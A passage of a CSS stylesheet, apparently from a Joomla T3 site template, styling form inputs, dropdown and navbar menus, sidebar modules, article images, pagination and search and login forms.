  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-left: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-left-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-left-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #cc0000;
  border-bottom-color: #cc0000;
}
.nav a:hover .caret {
  border-top-color: #800000;
  border-bottom-color: #800000;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-left: 0;
  padding-right: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  content: " ";
  display: table;
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: left;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
}
@media screen and (min-width: 768px) {
  .counter {
    float: right;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  right: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -15px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #cc0000;
  border-color: #b30000;
}
.navbar-default .navbar-text {
  color: #ffcccc;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-left: 30px;
  }
}
.navbar-default .navbar-nav > li > a {
  color: #ffcccc;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #b30000;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #ffcccc;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #b30000;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #ffcccc;
  border-bottom-color: #ffcccc;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #b30000;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #990000;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffcccc;
    padding: 20px 20px 20px 30px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #990000;
    border-top: 1px solid #800000;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #800000;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-left: 40px;
  }
}
.navbar-default .navbar-link {
  color: #ffcccc;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #b30000;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-left: 0;
  padding-right: 0;
  float: left;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -15px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-right: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #b30000;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  left: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  right: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  content: " ";
  display: table;
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-left: 20px;
  padding-left: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-left: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-left: 0;
  margin-left: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #b30000;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    left: auto;
    right: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: right;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-right: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-left: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0px;
}
.module-ct .whosonline {
  margin-left: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0px;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 5px 5px 0;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: left;
  margin: 0 5px 5px 0;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #cc0000;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #800000;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #800000;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-right: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #cc0000;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-left: 0;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-left: 0;
  margin-right: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-right: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #cc0000;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #800000;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align=left],
.article-intro img[align=left],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align=left],
  .article-intro img[align=left],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0;
  }
}
article img[align=right],
.article-intro img[align=right],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align=right],
  .article-intro img[align=right],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0;
  }
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: left;
}
.img-fulltext-right {
  float: right;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: left !important;
  margin-left: 0 !important;
}
.pull-right.article-image-intro img {
  margin-left: 0 !important;
  margin-right: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-left: 0;
    margin-right: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #800000;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-left: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
@media screen and (min-width: 768px) {
  .tag-category .filters {
    padding: 20px;
  }
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-left: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: left;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-left: 0;
  padding-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-left: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: left;
  vertical-align: middle;
  margin-left: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-left: 15px;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-left: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-left: 140px;
}
.registration fieldset dt {
  margin-right: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: left;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-right: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-left: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-left: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-left: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0px;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: left;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: left;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-left: 5px;
}
#searchForm:before,
#searchForm:after {
  content: " ";
  display: table;
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-left: 5px;
  padding-left: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-left: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
.filter-branch:after {
  content: "";
  clear: both;
  display: table;
}
.filter-branch .finder-selects {
  margin-right: 20px;
  margin-bottom: 20px;
}
.filter-branch .finder-selects .control-label {
  margin-bottom: 10px;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-left: 0;
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.category-item:before,
.category-item:after {
  content: " ";
  display: table;
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-left: 30px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  content: " ";
  display: table;
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-left: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: left;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-left: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 0 20px 20px;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0px;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0px;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #cc0000;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
